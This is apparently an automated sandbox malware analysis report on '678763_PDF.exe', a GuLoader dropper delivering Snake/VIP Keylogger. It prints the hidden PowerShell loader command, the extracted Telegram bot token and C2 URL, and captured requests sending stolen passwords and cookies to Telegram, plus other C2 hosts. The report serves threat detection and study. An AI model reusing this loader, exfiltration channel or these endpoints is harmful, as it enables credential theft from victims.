Edit tour

Windows Analysis Report
678763_PDF.exe

Overview

General Information

Sample name:	678763_PDF.exe
Analysis ID:	1566735
MD5:	42b3eeff606c41053b2b30e6df1baa87
SHA1:	8957ac95d71567ccf7d0efc28ddcc944352308d0
SHA256:	f3b82a629b1eff8b49edcfb38f2d0cbd0ef366a59a97264eb7b86373a45588c4
Tags:	exeGuLoaderuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

678763_PDF.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\678763_PDF.exe" MD5: 42B3EEFF606C41053B2B30E6DF1BAA87)

powershell.exe (PID: 7308 cmdline: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Beskftigelsesmssiges.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe" MD5: 42B3EEFF606C41053B2B30E6DF1BAA87)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI", "Chat_id": "7844469787", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2156462288.000000000A4F3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Beskftigelsesmssiges.exe PID: 7852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Beskftigelsesmssiges.exe PID: 7852	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) ", CommandLine: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\678763_PDF.exe", ParentImage: C:\Users\user\Desktop\678763_PDF.exe, ParentProcessId: 7272, ParentProcessName: 678763_PDF.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) ", ProcessId: 7308, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T16:15:13.419750+0100	2803305	3	Unknown Traffic	192.168.2.4	49772	172.67.177.134	443	TCP
2024-12-02T16:15:16.737515+0100	2803305	3	Unknown Traffic	192.168.2.4	49779	172.67.177.134	443	TCP
2024-12-02T16:15:23.789550+0100	2803305	3	Unknown Traffic	192.168.2.4	49797	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T16:15:09.022615+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49745	132.226.8.169	80	TCP
2024-12-02T16:15:11.710105+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49745	132.226.8.169	80	TCP
2024-12-02T16:15:15.100741+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49778	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T16:14:55.175759+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI", "Chat_id": "7844469787", "Version": "4.4"}
Source: Beskftigelsesmssiges.exe.7852.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: 678763_PDF.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 678763_PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49766 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49839 version: TLS 1.2

Source: 678763_PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %^qm.Core.pdb source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbL source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00402910 FindFirstFileW,	6_2_00402910
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_004068B4 FindFirstFileW,FindClose,	6_2_004068B4

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd144b65092187Host: api.telegram.orgContent-Length: 581
Source: global traffic	HTTP traffic detected: POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1476a1d87ad0Host: api.telegram.orgContent-Length: 7046Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49778 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.19.174:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49772 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49797 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49766 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd144b65092187Host: api.telegram.orgContent-Length: 581

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 02 Dec 2024 15:15:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2959403043.0000000023630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2149944779.0000000006F73000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2143382911.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: 678763_PDF.exe, Beskftigelsesmssiges.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844
Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
